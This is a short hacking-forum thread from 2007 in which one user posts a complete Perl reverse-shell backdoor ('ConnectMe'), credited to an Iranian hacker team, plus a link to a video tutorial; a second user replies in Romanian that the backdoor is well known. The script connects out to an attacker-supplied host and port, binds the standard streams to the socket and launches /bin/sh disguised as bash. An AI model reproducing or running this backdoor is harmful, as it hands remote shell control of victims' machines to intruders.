Ras Posted June 13, 2007 Report Posted June 13, 2007 #!/usr/bin/perl# ConnectMe version 1.0 (BackDoor)# IRAN HACKERZ SECURITY TEAM # By Hessam-x# keep Priv8 or die !! # Only for teamuse Socket;print "---------------------------------------\n";print "= ConnectMe (Back Backdoor) =\n";print "= IRAN HACKERZ SECURITY TEAM =\n";print "= coded by Hessam-x =\n";print "---------------------------------------\n";$host = $ARGV[0];$port = $ARGV[1]; if (!$ARGV[0]) { printf "[!] Usage: perl dc.pl <Host> <Port>\n"; exit(1);}print "[+] Connecting to $host\n";$prot = getprotobyname('tcp'); # u can change thissocket(SERVER, PF_INET, SOCK_STREAM, $prot) || die ("[-] Unable to Connect !");if (!connect(SERVER, pack "SnA4x8", 2, $port, inet_aton($host))) {die("[-] Unable to Connect !");} open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER");print "---------------------------------------\n";print "= ConnectMe (Back Backdoor) =\n";print "= IRAN HACKERZ SECURITY TEAM =\n";print "= coded by Hessam-x =\n";print "---------------------------------------\n"; exec {'/bin/sh'} '-bash' . "\0" x 4; Videotutorial: http://barzan.persiangig.com/Ro0t%20Video.zip Quote
Dark_net Posted June 14, 2007 Report Posted June 14, 2007 Ii foarte cunoscut amuia acesta backdoor pentru reverse shell Quote